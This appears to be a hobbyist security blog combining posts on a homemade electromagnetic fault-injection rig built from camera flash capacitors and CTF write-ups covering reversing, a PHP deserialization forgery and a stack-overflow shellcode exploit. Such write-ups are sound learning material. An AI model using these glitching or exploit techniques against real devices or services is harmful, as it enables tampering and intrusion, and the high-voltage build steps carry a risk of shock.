EM Fault Injection on a Budget (Part 2)

During my last post on this topic, I had explored the possibility of building an EM fault injection rig for home experimentation. In this post, I will discuss my progress, as well as initial exploration of the attack surface of two live targets, as well as next steps.

Remember – fooling around with high-voltage capacitors can injure or kill you – but nothing wagered, nothing gained.

Device Improvements

The first step of my exploration was to modify the glitching platform to a more portable form, resulting in the following:

This is a somewhat safe and simple circuit, utilising a thyristor to “dump power” from the coil, and optocouplers / MOSFET’s to control charge and discharge. Unfortunately, the above device looks is a dirty hack job, due to two mistakes I had made:

  • Firstly, the thyristor was placed on the wrong end of the load. I didn’t realize this would become a problem, until I noticed a significant reduction in the strength of the magnetic field generated (read: the distance it was able to shoot a nail). The thyristor *must* be between the negative end of the capacitor and your coil, or you will lose power.
  • Secondly, I had used a gate resistor on the MOSFET, instead of a gate-source resistor. You *must* have a gate-source resistor, if you are using a MOSFET to enable charging: otherwise, your capacitor will be charge to not-0V when you are expecting 0V, leading to an exceptionally painful shock.

This circuit also includes a simple plug-and-play interface for the installation of a capacitor bank, allowing adjustment of the voltage to suit your target.

With this step complete and tested (using an Arduino to fire a small piece of metal programmatically as the test case), I moved onto the next part of this adventure.

Coil Design

The next stage was to improve the coil. Our goal was to create a targetted, yet strong magnetic field, which would impact the function of transistors inside an IC, without greatly impacting the rest of the device.

Some theory (Biot-Savart’s law) exists about this, a simplified form of which is as follows:

(On a side note – the red ink above is actually Iroshizuku Momiji, the shitty lighting really doesn’t do it justice).

In practice, this is a black art, with different sources claiming different effectiveness of different coil designs. I followed in the footsteps of the folks at Red Balloon Security, in their recent presentation at RECon. By attempting to induce a second order glitch, I could be happy with an entire component failing temporarily and still get the result I want, making the constraints on the coil *much* more relaxed.

I initially attempted to work with the coil I initially used, though to limited success – I was unable to make this reliably and repeatably glitch a production device. This coil was an “air core” coil – going back to the above, it should be noted that the permeability of a ferromagnetic core in a coil would be many, many times that of air.

I had most success with a hand-wound coil like this, utilizing approximately 25 turns of high-guage wire across a 8mm core:

Initial Success and Failure

Using this coil, I am able to repeatedly and reliably generate a second-order glitch, by impeding the functionality of components on two D-Link routers (DSL2880AL and DSL2750U). In the DSL2880AL, I am able to repeatedly crash the Ethernet controller by hand at a capacitor charge level of approximately 160-180V:

I was also able to crash a DSL2750U device by targetting the main MCU. This is displayed in the screenshot above: using this positioning, we can reliably generate a system halt (but no fancy screencap). I believe I may be able to induce a similar fault against the Flash memory chip to a more refined effect, but have not yet instrumented this process.

Next Steps

At this point, I should mention that the implications of this type of thing are tremendous: this allows us both an exploratory tool, as well as a way to intentionally fail a discrete operation at a time of our choosing. Attacks which blur the line between hardware and software have always held a special place in my heart, and my vast abyss that is my life is somewhat brightened by the opportunity to play in this space.

Several improvements are still needed to this device. The ones I can think of are:

  • The device needs a faster charge cycle, and the ability to cycle multiple capacitors. I’m not sure whether the switching time of something like an IGBT is enough to “switch off” a magnetic field (or if it would make sense in terms of the effect it would have on a transistor… or in the mechanism of discharging the capacitor).
  • The device needs is currently driven by an Arduino, but the timing is not sufficiently controlled – an FPGA should be used (triggered by the Arduino to wait, then trigger the optocoupler to fire the device) in addition to the existing controller mechanism. To this end, I am learning Verilog (hardware constraint files can go fuck themselves – spent an hour messing around today until I realized I forgot to define the clock).
  • The device needs some kind of voltage level sensor, that’s more accurate than a single red status LED. This should feed back to the control mechanism, so I can measure voltage using something more accurate than guesswork and a hard-coded set of data points.
  • Once a voltage sensor is in place, the entire rig should be encased in something so that I can’t accidentally shock myself any more.

Recently, I have spent a significant amount of time learning various attacks and discovery methods against hardware – learning to “ride the bus”, as it were. From here, this project becomes lesser priority: I will spend time learning general hardware security / tampering, and then come back to better utilize EM glitching as a tool.

See you all in this weekend’s CTF’s.

Posted in Bards, Computers, Jesting | Tagged , | Leave a comment

Writeups – asby, abuse mail (Late) (SHA2017)

This weekend, I participated in the SHA2017 CTF. I was able to solve one challenge in the time available, then was able to solve a second, but unfortunately too late to score anything. The writeups are presented below.

asby

The “asby” challenge was presented as a Windows binary file, which you can download here. A hint was provided – that we could “asby” the flag out.

Upon initial inspection, we quickly notice an interesting string usage, which indicates a sequential check against the flag:

I immediately applied the principle of “brute force, best force” against the application’s stdout, but trickery was afoot: that is, a brute-force search would indicate that “0” was the correct first character of the flag, but upon manually checking with a flag of “01”, the program indicated that “0” was not the correct first character.

We then inspect the logical flow of the application. We can use IDA’s graph mode to identify what appears to be a character check:

Following the disassembly backwards, we note that a character is loaded at 0x40179d, an “xor key” seems to be loaded at 0x401789 (the source of “ecx” in the above). The two characters are xor’ed together, then xor’ed with 0x2a, and compared with a value in al.

We can use windbg to inspect the state of the executable, breaking at the above two addresses and inspecting the strings loaded:

We then break at the final address of 0x4017A7, to identify what’s being compared against what:

Following the disassembly backwards, we can see that al comes from the the first character of the two loaded strings above xor’ed together, then xor’ed together with 0x2a, where 0x4B is the first character of our input (“a_123”) xor’ed with 0x2a.

We then build a quick python script to take the two strings above, xor them together and xor them with 0x2a, which you can download here.

Unfortunately, this only brings us a part of the flag:

At this point, I wondered if an initial “failsafe” check had been put in place, to prevent naive brute forcing, but if this would remain untouched if we provided a part of the correct key. I modified my original brute force script to include the first part of the correct key, and to create a new process for each brute force attempt, as I knew that a maximum of 100/115 tries was permitted before the process died – this revealed the flag in short order:

You can download the final Python script here.

Abuse Mail (Late Writeup)

The “Abuse Mail” challenge was presented as a zip file containing three packet captures, which you can download here.

Our initial inspection reveals “abuse01.pcap” to contain some telnet data followed by an ipsec connection, while the other pcaps contain some manner of data encoded within ICMP ping packets. We begin our analysis by recovering the ipsec tunnel keys, to allow us to decode the ipsec tunnel. We can get this from the telnet session:

This reveals the ipsec tunnel to be hiding an HTTP connection. Browsing the connection stream reveals the installation of a backdoor in /tmp/backdoor.py. Fortunately, the full file is provided in the IPSec tunnel:

as well as the command line used to launch it (revealing the AES key):

From here, we can easily reverse engineer the backdoor script to allow us to decode the streams encoded in the “abuse02.pcap” and “abuse03.pcap” packets. Here, I took two shortcuts – firstly, as the data was encoded as a string, I simply ran strings across the pcaps and filtered for “SHA2017”. Secondly, I did some “duct tape debugging”: I simply tried trial and error with base64 padding when I couldn’t decode a packet, instead of attempting to understand the protocol and it’s hazards fully.

You can download this decoder here.

We start off by decoding abuse02.pcap, which you can download here. We immediately note the presence of a private key, and save it:

Finding little else of significant interest, we proceed to abuse03.pcap, which appears to be responses to the “getfile” command. My initial attempt at decoding this file met with failure, as I simply pasted the data chunks in chronological order. Going back to the original Python backdoor, we note that each “getfile” chunk comes in the following form:

getfile:<cnt>:data

Where “cnt” was an incremental counter. We note that some “cnt” files are repeated, so we seperate them out into two seperate pcap files (I actually got here by happy accident – I initally just filled an array with chunks, keyed to the “cnt” field – this generated one of these files, but with extra data at the end, leading to the second). The first file is a USB packet capture:

We know from the USB descriptor (and Google’s boundless wisdom) that this is infact a HID keyboard. The actual “keypress” data is stored in URB_INTERRUPT packets, as follows:

We can use “tshark” to spit out the capture data from URB_INTERRUPT packets (or rather, the packets with extra capturedata, corresponding to our keystroke packets) as follows:

tshark -r out.pcap -T fields -e usb.capdata

Taking the output from this, we can refer to the USB HID standard, and map these packets to actual keystrokes. A quick Python script does the job, which you can download here. The keys typed are as follows:

The carat characters represent the shift key, so the unzip password in this case is “Pyj4m4P4rtY@2017”.

We then return to the other file which we were able to extract from abuse03.pcap, which is a TLS-encoded stream. Using the private key we were able to recover earlier, we can then save “secret.zip” from the stream:

Decoding it with the password captured from the USB packet capture reveals the flag:

As always, thanks to the SHA2017 CTF organisers for putting together a fun and challenging event – I was not expecting a 300-point challenge to be this in-depth.

See you all in the HackIT CTF in two weeks time!

Posted in Bards, Computers, Jesting | Tagged , , | Leave a comment

Writeups – rev75, SimplePHP, pwn100 (Bugs Bunny CTF)

This weekend, I participated in the curiously named Bugs Bunny CTF (www.bugsbunnyctf.me). Unfortunately, due to very poor record-keeping (and general incompetence in solving some more interesting challenges) on my part, I am only able to present a few limited writeups.

rev75

rev75 was presented as a 64-bit Linux binary file, which you can download here. At first glance, this is a stock standard reverse engineering challenge, with a simple string comparison leading to a flag. However, trying this reveals that the challenge goes further:

Going back into IDA Pro, we can notice a multitude of functions which seem to do something with base64-encoded blocks, as well as two functions (“encrypt” and “decrypt”):

Calling these functions in gdb doesn’t seem to do anything, so we go for our next best option – we extract the base64 blobs (in order they are presented in the binary) join them together and try to make sense of the output.

The output is presented as a valid PNG file: unfortunately, it doesn’t seem to render, and strings doesn’t show anything obvious. We then head for our trusty 010 editor PNG template:

010 editor quickly reveals that the last IDAT chunk stretches past the end of the file. Scrolling to the end of the file reveals an IEND chunk, and a quick ctrl-F doesn’t show any more IDAT chunks – my next step is to manually tweak the size of the last chunk. A little bit of math later, and we arrive at a size of 6039, which ends the IDAT where the IEND begins, revealing a broken image, which is good enough to scavenge the flag from:

SimplePHP

The SimplePHP challenge was presented as a website, with accompanying source code, which you can download here.

This challenge introduced me to the PHP concept of a “variable variable”. That is:

$a = 1;
$b = "a";
$$b = 2
$a == 2

My initial attempt was to set the $flag variable to something I controlled, then send a “flag” POST variable – this got me to the “200” response, but didn’t give me the flag. Thinking a bit further, I noted the _200 and _403 variables – what if I could use one of these to “store” the $flag variable, then trigger a controlled response?

pwn100

The “pwn100” challenge was presented as a Linux binary, which you can download here.

After some initial analysis in IDA Pro and some trickery in gdb, we know that this is a simple stack-based overflow, with the vulnerable function in plain sight:

With a little trial and error, we’re able to control EIP. Unfortunately, we don’t know where our vulnerable buffer is on the target – but a little bit of inspection in gdb reveals that the location of our buffer is in eax:

A quick detour into Ropper (I’m sure PEDA also has an option for finding it), and we identify a clean control transfer to eax at 0x08048386. We set this as our return address, modify some standard /bin/sh shellcode to clean up the stack (so it can use the “push” instruction), and we’re in business:

You can download the completed exploit here.

I’d like to thank the organisers of Bugs Bunny CTF for an enjoyable event – a shame that the timing was such that fully half the challenges were added while I could not play, due to the thrice-accursed misfortune of having to wake up for a 9am meeting on Monday. At the time of writing, these challenges appear to still be online, so I will attempt to devote some time this week to completing more of these challenges.

See you all in SHA2017 CTF next weekend.

Posted in Uncategorized | Leave a comment

EM Fault Injection on a Budget

Following on from my earlier successes with glitching, I have continued investigating various methods to induce faults in hardware. One less-talked-about method is EM fault injection, which relies on using a capacitor discharge to create a temporary magnetic field, which can influence the state of transistors (and other electronics).

My test device is not complete – I have built the hardware, but I do not yet have the components I need to drive it with something programmable. However, this is a lot of fun, and thus worth writing about.

WARNING: This post involves high-voltage capacitors. Do not fuck with them. Also, this may be not clear in legality depending on where you live: always act in accordance with the laws and statues of your land. Be safe, be ethical, leave no trace behind.

Theory

There is some limited previous literature on this topic, mostly in academia:

The best practical reference I can find to this is by Risecure, which sells a commercial EM glitching workstation [?].

This is similar to the voltage glitching technique described in a previous post: however, instead of diverting a power supply, this uses a temporary strong magnetic field to induce unexpected electrical activity, affecting the state of various components (e.g. a transistor). This can be expressed in the following diagram:

This is the same as how a coil gun works: that is, by generating a strong temporary magnetic field, you can “throw” a projectile “through” a coil. The device we will build is effectively a less powerful version of a typical coil gun, as the intent is not actually to throw a projectile, but to induce faults in hardware otherwise implemented securely.

Implementation – Coilguns 101

I started off by purchasing two FujiFilm “QuickSnap” disposable cameras last week. These are popular in Australia, and can be purchased from camera stores, convenience stores and apparently Officeworks. I disassembled the case, making sure not to enable the flash functionality, and to discharge the capacitors:

You can safely discharge this by touching both ends with a piece of metal (don’t touch the metal directly). If you did it right, you should see and hear a spark.

Once this is done, bend the capacitor away from the flash bulb, and then let’s get soldering:

Solder thusly:

  • The red box is the “flash enable” switch, which is activated with a toggle switch on the front of the camera case. Solder this closed (as if this were permanently enabled).
  • The blue box is the “flash trigger” switch, which is a contact switch that turns on when you press the shutter. Solder this closed (as if you were always pressing the camera trigger).
  • The maroon box is the flash bulb contacts. Desolder the flash bulb, and in it’s place, solder 2 pieces of wire, which we’ll leave unconnected for now.

If you have trouble desoldering the flash bulb, try washing the existing connection with solder flux first, then melting some lead solder “onto” it: the existing blob of solder should insta-melt (possibly because the lead lowers the melting point of whatever the fuck that is?). Poke it with a piece of desoldering braid to “soak up” the blob of solder.

Now, take a portion of enameled wire / winding wire, and loop it around something a few times. I started off with a matchstick, like this:

At this point, you can begin testing the device. Remember those two wires we left disconnected in the last step? Connect one to one end of your coil, and leave the other free. We will discharge the capacitor by connecting the free end of the coil to the free wire from the flash bulb terminal.

Charge your capacitor by inserting the battery, as per the original battery installation (the short end of the battery enclosure corresponds to the negative terminal no the battery itself). You should hear a soft whining sound, followed by a red LED slowly lighting up – it’s next to the capcitor. When this is lit, charging is complete.

Then, position your coil close to something ferromagnetic (I used a screw), and complete the circuit (without touching any conductive surfaces). You should see (and hear) another spark where you complete the circuit, and the screw should move, indicating glorious success.

Inducing Faults

The next step is to induce a fault in an arduino microcontroller. For this step, I used a Freetronics Eleven (https://www.freetronics.com.au/products/eleven), but anything you have lying around should do. Position your coil above the MCU:

Then, begin a counting loop on your target device, and begin trying to induce faults. There is no science to this: too many factors come into play (strength of magnetic field, duration, positioning of coil, orientation of coil, etc). In doing this, I was never able to induce a meaningful fault, but I could cause the device to crash:

Emboldened by what appeared to be a success, I continued experimenting with this technique, I continued experimenting with this.

Glitching Rig Improvements

I proceeded to improve my test setup, by modularising the device – I wanted the device to be portable, as well as plug and play: I should be able to add or remove capacitors, to adjust the strength of the magnetic field generated.To do this, I desoldered the original capacitor (as well as battery pack), and soldered header cables onto everything, so I could use a breadboard to adjust portions of the device:

The final glitching device looks like this – in this configuration, we have wired up two capacitors in parallel for additional power, and the coil is replaced with an entire spool of 0.25mm wire.

I also experimented with the configuration of the coil in relation to the device, and I found the following configuration to produce the most reliable glitches:

Similar to regular glitching, this process is unreliable, but I was able to produce some crashes semi-consistently, as well as some interesting effects, like the below:

Next Steps/ Thoughts

The implications of this are significant – while unreliable, this allows us to attack hardware when only limited interaction is possible (e.g. it’s in a difficult-to-reach setup). We can simply point our coil / antenna at it, discharge a capacitor though it. Several factors hold us back:

  • Capacitors have a charge time, and are the limiting factor in how many tries per minute we get, regardless of how well we automate everything else. Given that glitching is already imprecise, our success rate will be low by definition (so this puts this technique somewhat in the “for fun” territory without serious investment, I think).
  • The variety of coils possible is immense – there doesn’t seem to be a single guide on how to build a glitching coil (I hear 20 turns around a needle?), different people have different methods.
  • This is a fine line between glitching and irrepairably bricking a device. The amount of things that could go wrong is tremendous, and this is less “controlled” than voltage glitching, which is confined to denying power for a portion of a clock cycle, generally against a single component.

The next steps of this project are to wait for the arrival of an optocoupler and a thyristor – these should allow the use of a programmable device to charge the device (a regular mosfet should work) as well as to trigger the coil safely. A power MOSFET may be needed for fast switching “off” of the coil as well, but that can just be a lift-and-shift in place of the thyristor.

I am keen to hear of other people’s successes or failures with this technique. If you’ve experimented with this, and had some success, please do let me know – I’m keen to learn how I can improve this setup to more reliably generate glitches, and use them “meaningfully” no less.

Have a safe and ethical week!

Posted in Bards, Computers, Jesting | Tagged , | 1 Comment

Writeup – TSULOTT (meepwn)

Over the past weekend, I spent a little time participating in the meepwn CTF. Unfortunately, during the time allocated, I was only able to solve a single challenge, and the simplest challenge at that. On the bright side, this is a PHP deserialize vulnerability, which I have not yet written about.

My writeup is below.

TSULOTT

The TSULOTT challenge was presented as a web page, which appears as follows:

To use this website, you can enter six numbers in the “code” section below, and generate a base64-encoded “code”. You then enter this “code” into the top input box – if you guessed six random numbers correctly, you presumably get the flag. My first step was to inspect the source code:

Making a request with is_debug spits out formatted source in the page. You can download the source here.

The logical flow of the vulnerable code is as follows:

  • A base64 “code” is submitted into $obj
  • Six random numbers are generated, stored into the $obj->jackpot property
  • The $obj->enter property is compared with $obj->jackpot
  • If the two are equal, you get a flag.

An “object” class is also defined in the source code:

class Object 
{ 
 var $jackpot;
 var $enter; 
}

The path to explotiation lies in creating a fake object, called something else (not “Object”, which seems to cause PHP to use it’s own class definition), which passes the “$obj->enter === $obj->jackpot” check, but doesn’t allow $obj->jackpot to be overwritten. Helpfully, PHP allows us to define “protected” properties, which cannot be modified, as per below:

class Test{
 protected $_data = array(
 "jackpot" => "12345"
 );
 var $enter;
}

We can then quickly create our own PHP script, which instantiates a “test” object, seeds the “$enter” variable, serializes it and base64 encodes it, revealing the flag:

You can download the solution here.

As always, I’d like to thank the meepwn team for creating this CTF – this challenge was a lot of fun, as was the “Be Human” challenge which I was unable to solve (text CAPTCHA recognition) in the allocated time.

See you all in the SHA2017 CTF!

Posted in Bards, Computers, Jesting | Tagged | Leave a comment